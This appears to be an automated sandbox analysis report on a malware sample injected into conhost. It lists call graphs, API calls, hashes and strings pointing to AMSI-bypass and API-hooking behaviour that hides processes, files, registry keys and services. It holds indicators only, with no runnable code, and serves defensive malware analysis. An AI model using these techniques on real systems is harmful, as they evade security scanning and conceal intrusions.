9002->9005 9003 2a5af371a71 9006 2a5af36d1f4 __free_lconv_mon 13 API calls 9003->9006 9004 2a5af371a9e HeapReAlloc 9004->9005 9004->9007 9005->8928 9006->9005 9007->9003 9007->9004 9008 2a5af36b470 __free_lconv_mon 2 API calls 9007->9008 9008->9007 9336 2a5af362ed8 9338 2a5af362f35 9336->9338 9337 2a5af362f50 9338->9337 9339 2a5af3638a8 3 API calls 9338->9339 9339->9337 8553 2a5af3663e3 8554 2a5af3663f0 8553->8554 8555 2a5af3663fc GetThreadContext 8554->8555 8562 2a5af36655a 8554->8562 8556 2a5af366422 8555->8556 8555->8562 8560 2a5af366449 8556->8560 8556->8562 8557 2a5af366581 VirtualProtect FlushInstructionCache 8557->8562 8558 2a5af36663e 8559 2a5af36665e 8558->8559 8571 2a5af364b20 8558->8571 8575 2a5af365530 GetCurrentProcess 8559->8575 8563 2a5af3664cd 8560->8563 8566 2a5af3664a6 SetThreadContext 8560->8566 8562->8557 8562->8558 8565 2a5af366663 8567 2a5af3666b7 8565->8567 8568 2a5af366677 ResumeThread 8565->8568 8566->8563 8569 2a5af368070 _invalid_parameter_noinfo 8 API calls 8567->8569 8568->8565 8570 2a5af3666ff 8569->8570 8573 2a5af364b3c 8571->8573 8572 2a5af364b9f 8572->8559 8573->8572 8574 2a5af364b52 VirtualFree 8573->8574 8574->8573 8578 2a5af36554c 8575->8578 8576 2a5af365593 8576->8565 8577 2a5af365562 VirtualProtect FlushInstructionCache 8577->8578 8578->8576 8578->8577 8579 2a5af36f3e4 8580 2a5af36f41d 8579->8580 8581 2a5af36f3ee 8579->8581 8581->8580 8582 2a5af36f403 FreeLibrary 8581->8582 8582->8581 8583 2a5af3733e4 8584 2a5af3733fb 8583->8584 8585 2a5af3733f5 CloseHandle 8583->8585 8585->8584 8210 2a5af373960 8220 2a5af368ca0 8210->8220 8212 2a5af373988 8215 2a5af373998 8216 2a5af369324 _CreateFrameInfo 9 API calls 8215->8216 8217 2a5af3739a1 8216->8217 8227 2a5af36c2f4 8217->8227 8223 2a5af368cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8220->8223 8221 2a5af368dd1 8221->8212 8224 2a5af369324 8221->8224 8222 2a5af368d94 RtlUnwindEx 8222->8223 8223->8221 8223->8222 8230 2a5af369340 8224->8230 8226 2a5af36932d 8226->8215 8228 2a5af36cab0 _invalid_parameter_noinfo 14 API calls 8227->8228 8229 2a5af36c2fd 8228->8229 8231 2a5af369358 8230->8231 8232 2a5af36935f GetLastError 8230->8232 8231->8226 8242 2a5af369c8c 8232->8242 8243 2a5af369aac __vcrt_InitializeCriticalSectionEx 5 API calls 8242->8243 8244 2a5af369cb3 TlsGetValue 8243->8244 9340 2a5af3706e0 9341 2a5af3706e9 9340->9341 9345 2a5af3706f9 9340->9345 9342 2a5af36d1f4 __free_lconv_mon 13 API calls 9341->9342 9343 2a5af3706ee 9342->9343 9344 2a5af36d04c _invalid_parameter_noinfo 38 API calls 9343->9344 9344->9345 8246 2a5af367f60 8247 2a5af367f7c 8246->8247 8248 2a5af367f81 8246->8248 8250 2a5af368090 8247->8250 8251 2a5af368127 8250->8251 8252 2a5af3680b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8250->8252 8251->8248 8252->8251 9009 2a5af37465f 9010 2a5af3746e2 9009->9010 9011 2a5af374677 9009->9011 9011->9010 9012 2a5af369324 _CreateFrameInfo 9 API calls 9011->9012 9013 2a5af3746c4 9012->9013 9014 2a5af369324 _CreateFrameInfo 9 API calls 9013->9014 9015 2a5af3746d9 9014->9015 9016 2a5af36c2f4 14 API calls 9015->9016 9016->9010 9017 2a5af37485e 9018 2a5af369324 _CreateFrameInfo 9 API calls 9017->9018 9019 2a5af37486c 9018->9019 9020 2a5af374877 9019->9020 9021 2a5af369324 _CreateFrameInfo 9 API calls 9019->9021 9021->9020 8586 2a5af365fcc 8587 2a5af365fd3 8586->8587 8588 2a5af366000 VirtualProtect 8587->8588 8590 2a5af365f10 8587->8590 8589 2a5af366029 GetLastError 8588->8589 8588->8590 8589->8590 9022 2a5af36824c 9023 2a5af368270 __scrt_acquire_startup_lock 9022->9023 9024 2a5af36b581 9023->9024 9025 2a5af36cb10 __free_lconv_mon 13 API calls 9023->9025 9026 2a5af36b5aa 9025->9026 9027 2a5af374848 9030 2a5af36904c 9027->9030 9031 2a5af369076 9030->9031 9032 2a5af369064 9030->9032 9033 2a5af369324 _CreateFrameInfo 9 API calls 9031->9033 9032->9031 9034 2a5af36906c 9032->9034 9036 2a5af36907b 9033->9036 9035 2a5af369074 9034->9035 9037 2a5af369324 _CreateFrameInfo 9 API calls 9034->9037 9036->9035 9038 2a5af369324 _CreateFrameInfo 9 API calls 9036->9038 9039 2a5af36909b 9037->9039 9038->9035 9040 2a5af369324 _CreateFrameInfo 9 API calls 9039->9040 9041 2a5af3690a8 9040->9041 9042 2a5af36c2f4 14 API calls 9041->9042 9043 2a5af3690b1 9042->9043 9044 2a5af36c2f4 14 API calls 9043->9044 9045 2a5af3690bd 9044->9045 8253 2a5af36ad48 8254 2a5af369324 _CreateFrameInfo 9 API calls 8253->8254 8255 2a5af36ad7d 8254->8255 8256 2a5af369324 _CreateFrameInfo 9 API calls 8255->8256 8257 2a5af36ad8b __except_validate_context_record 8256->8257 8258 2a5af369324 _CreateFrameInfo 9 API calls 8257->8258 8259 2a5af36adcf 8258->8259 8260 2a5af369324 _CreateFrameInfo 9 API calls 8259->8260 8261 2a5af36add8 8260->8261 8262 2a5af369324 _CreateFrameInfo 9 API calls 8261->8262 8263 2a5af36ade1 8262->8263 8276 2a5af36993c 8263->8276 8266 2a5af369324 _CreateFrameInfo 9 API calls 8267 2a5af36ae11 __CxxCallCatchBlock 8266->8267 8283 2a5af369978 8267->8283 8269 2a5af36aeeb __CxxCallCatchBlock 8270 2a5af369324 _CreateFrameInfo 9 API calls 8269->8270 8271 2a5af36aefe 8270->8271 8272 2a5af369324 _CreateFrameInfo 9 API calls 8271->8272 8274 2a5af36af07 8272->8274 8277 2a5af369324 _CreateFrameInfo 9 API calls 8276->8277 8278 2a5af36994d 8277->8278 8279 2a5af369324 _CreateFrameInfo 9 API calls 8278->8279 8281 2a5af369958 8278->8281 8279->8281 8280 2a5af369324 _CreateFrameInfo 9 API calls 8282 2a5af369969 8280->8282 8281->8280 8282->8266 8282->8267 8284 2a5af369324 _CreateFrameInfo 9 API calls 8283->8284 8285 2a5af36998a 8284->8285 8286 2a5af3699c5 8285->8286 8287 2a5af369324 _CreateFrameInfo 9 API calls 8285->8287 8288 2a5af369995 8287->8288 8288->8286 8289 2a5af369324 _CreateFrameInfo 9 API calls 8288->8289 8290 2a5af3699b6 8289->8290 8290->8269 8291 2a5af368ff8 8290->8291 8292 2a5af369324 _CreateFrameInfo 9 API calls 8291->8292 8293 2a5af369006 8292->8293 8293->8269 9346 2a5af36b0d4 9353 2a5af36b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9346->9353 9347 2a5af36b0fb 9348 2a5af369324 _CreateFrameInfo 9 API calls 9347->9348 9349 2a5af36b100 9348->9349 9350 2a5af369324 _CreateFrameInfo 9 API calls 9349->9350 9351 2a5af36b10b __FrameHandler3::GetHandlerSearchState 9349->9351 9350->9351 9352 2a5af3699cc 9 API calls Is_bad_exception_allowed 9352->9353 9353->9347 9353->9351 9353->9352 9354 2a5af3699f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9353->9354 9354->9353 9046 2a5af362e54 9048 2a5af362ea8 9046->9048 9047 2a5af362ec3 9048->9047 9050 2a5af3637f4 9048->9050 9051 2a5af36388a 9050->9051 9053 2a5af363819 9050->9053 9051->9047 9052 2a5af363f88 StrCmpNIW 9052->9053 9053->9051 9053->9052 9054 2a5af361e08 StrCmpIW StrCmpW 9053->9054 9054->9053 8591 2a5af3719d0 8592 2a5af36e864 56 API calls 8591->8592 8593 2a5af3719d9 8592->8593 8294 2a5af37494f 8295 2a5af374968 8294->8295 8296 2a5af37495e 8294->8296 8298 2a5af36c5ac LeaveCriticalSection 8296->8298

                                            Executed Functions

                                            Function 000002A5AF361E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 3b4f300a9b6db61ca495790df6a14bafc6475139842ba37656d7c6d50d160790
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 3B519BA3310E6AA7FB8CEB65FC487C77720A702788F9187139549025679E7CC25EC392
                                            Function 000002A5AF361E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 74041ea197c40af10377fcbbaa2e2dba22ea61593caa7f528941ec8b06b6d436
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: DFD04212722E2197FB8CAB11F8983563261AB66B41F840617850A022A69E2C955D9342
                                            Function 000002A5AF363A1C Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 000002A5AF363A35
                                            • PathFindFileNameW.SHLWAPI ref: 000002A5AF363A44
                                              • Part of subcall function 000002A5AF363F88: StrCmpNIW.SHLWAPI(?,?,?,000002A5AF36272F), ref: 000002A5AF363FA0
                                              • Part of subcall function 000002A5AF363EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363EDB
                                              • Part of subcall function 000002A5AF363EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F0E
                                              • Part of subcall function 000002A5AF363EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F2E
                                              • Part of subcall function 000002A5AF363EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F47
                                              • Part of subcall function 000002A5AF363EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A5AF363A5B), ref: 000002A5AF363F68
                                            • CreateThread.KERNELBASE ref: 000002A5AF363A8B
                                              • Part of subcall function 000002A5AF361E74: GetCurrentThread.KERNEL32 ref: 000002A5AF361E7F
                                              • Part of subcall function 000002A5AF361E74: CreateThread.KERNELBASE ref: 000002A5AF362043
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362049
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362055
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362061
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF36206D
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362079
                                              • Part of subcall function 000002A5AF361E74: TlsAlloc.KERNEL32 ref: 000002A5AF362085
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 6f5d9a531735fbfa10f934f86c6fee7f1753f7bd3e0309f26d4d482ba7c53596
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: B0114023B20EA183FBECA721F54D36B22A0A757745F50436BA506823D3DF7CC45C9642
                                            Function 000002A5AF332EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 6ffb68d5cb71dc107652523e8647b7231f583fa380f8d3b4b5355e44697fbb6d
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: ED912573B01A6087DB68DF29E408B6AB391F745B98F54C3239E4A0778ADE38D816C701
                                            Function 000002A5AF361BC4 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000002A5AF361724: GetProcessHeap.KERNEL32 ref: 000002A5AF36172F
                                              • Part of subcall function 000002A5AF361724: HeapAlloc.KERNEL32 ref: 000002A5AF36173E
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3617AE
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3617DB
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3617F5
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361815
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361830
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361850
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36186B
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF36188B
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3618A6
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF3618C6
                                            • SleepEx.KERNELBASE ref: 000002A5AF361BDF
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF3618E1
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361901
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36191C
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF36193C
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361957
                                              • Part of subcall function 000002A5AF361724: RegOpenKeyExW.ADVAPI32 ref: 000002A5AF361977
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF361992
                                              • Part of subcall function 000002A5AF361724: RegCloseKey.ADVAPI32 ref: 000002A5AF36199C
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: 991014dff11174e476bec32493bcdda1279589ddef9231e35410e1579aedda04
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: E0310F67300E6143EB98BB27F55836F73A4AB46FC0F245A238F0987297DE14C8588256

                                            Non-executed Functions

                                            Function 000002A5AF362FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 197 2a5af362ff0-2a5af363069 199 2a5af363384-2a5af3633a7 197->199 200 2a5af36306f-2a5af363075 197->200 200->199 201 2a5af36307b-2a5af36307e 200->201 201->199 202 2a5af363084-2a5af363087 201->202 202->199 203 2a5af36308d-2a5af36309d GetModuleHandleA 202->203 204 2a5af3630b1 203->204 205 2a5af36309f-2a5af3630af GetProcAddress 203->205 206 2a5af3630b4-2a5af3630d2 204->206 205->206 206->199 208 2a5af3630d8-2a5af3630f7 StrCmpNIW 206->208 208->199 209 2a5af3630fd-2a5af363101 208->209 209->199 210 2a5af363107-2a5af363111 209->210 210->199 211 2a5af363117-2a5af36311e 210->211 211->199 212 2a5af363124-2a5af363137 211->212 213 2a5af363139-2a5af363145 212->213 214 2a5af363147 212->214 215 2a5af36314a-2a5af36314e 213->215 214->215 216 2a5af363150-2a5af36315c 215->216 217 2a5af36315e 215->217 218 2a5af363161-2a5af36316b 216->218 217->218 219 2a5af363251-2a5af363255 218->219 220 2a5af363171-2a5af363174 218->220 221 2a5af36325b-2a5af36325e 219->221 222 2a5af363376-2a5af36337e 219->222 223 2a5af363186-2a5af363190 220->223 224 2a5af363176-2a5af363183 call 2a5af361a30 220->224 227 2a5af36326f-2a5af363279 221->227 228 2a5af363260-2a5af36326c call 2a5af361a30 221->228 222->199 222->212 225 2a5af3631c4-2a5af3631ce 223->225 226 2a5af363192-2a5af36319f 223->226 224->223 231 2a5af3631d0-2a5af3631dd 225->231 232 2a5af3631fe-2a5af363201 225->232 226->225 230 2a5af3631a1-2a5af3631ae 226->230 234 2a5af36327b-2a5af363288 227->234 235 2a5af3632a9-2a5af3632ac 227->235 228->227 239 2a5af3631b1-2a5af3631b7 230->239 231->232 240 2a5af3631df-2a5af3631ec 231->240 242 2a5af363203-2a5af36320d call 2a5af361cc4 232->242 243 2a5af36320f-2a5af36321c lstrlenW 232->243 234->235 244 2a5af36328a-2a5af363297 234->244 237 2a5af3632b9-2a5af3632c6 lstrlenW 235->237 238 2a5af3632ae-2a5af3632b7 call 2a5af361cc4 235->238 248 2a5af3632d9-2a5af3632e3 call 2a5af363f88 237->248 249 2a5af3632c8-2a5af3632d7 call 2a5af361cfc 237->249 238->237 264 2a5af3632ee-2a5af3632f9 238->264 246 2a5af363247-2a5af36324c 239->246 247 2a5af3631bd-2a5af3631c2 239->247 250 2a5af3631ef-2a5af3631f5 240->250 242->243 242->246 253 2a5af36322f-2a5af363241 call 2a5af363f88 243->253 254 2a5af36321e-2a5af36322d call 2a5af361cfc 243->254 252 2a5af36329a-2a5af3632a0 244->252 258 2a5af3632e6-2a5af3632e8 246->258 247->225 247->239 248->258 249->248 249->264 250->246 261 2a5af3631f7-2a5af3631fc 250->261 263 2a5af3632a2-2a5af3632a7 252->263 252->264 253->246 253->258 254->246 254->253 258->222 258->264 261->232 261->250 263->235 263->252 269 2a5af3632fb-2a5af3632ff 264->269 270 2a5af363370-2a5af363374 264->270 271 2a5af363307-2a5af363321 call 2a5af373a40 269->271 272 2a5af363301-2a5af363305 269->272 270->222 274 2a5af363324-2a5af363327 271->274 272->271 272->274 276 2a5af363329-2a5af363347 call 2a5af373a40 274->276 277 2a5af36334a-2a5af36334d 274->277 276->277 277->270 279 2a5af36334f-2a5af36336d call 2a5af373a40 277->279 279->270
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 5ee23c1e581e72a48f2f8e8175e9a4eb0c626b0b446672dee2f5188ce553a6f4
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 49B16B23310AE083EBAC9F26E4087ABA3A4F746B88F545257EE0953796DF35CD48C341
                                            Function 000002A5AF3684B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: ea12458fef4abb1a4077725d688c9fc35c232cd066aa2c49990d0e7a85352d53
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: E0310662315A9086EBA89F60E8443EA7364F789748F44412BDA4E47A9ADF78C6488711
                                            Function 000002A5AF36CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 1500eac117c163d55e1cbc2b84dd8e48126512dba1a735de6b3622cb391ff117
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 30415A37314F9086E7A8CB24E8443AB73A4F78A794F500217EA9D47B9ADF78C559CB01
                                            Function 000002A5AF36DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: f03a222bf1c7bcd09742109b5adbb48b23e9054ab4a8f79768959b9909eb8ca3
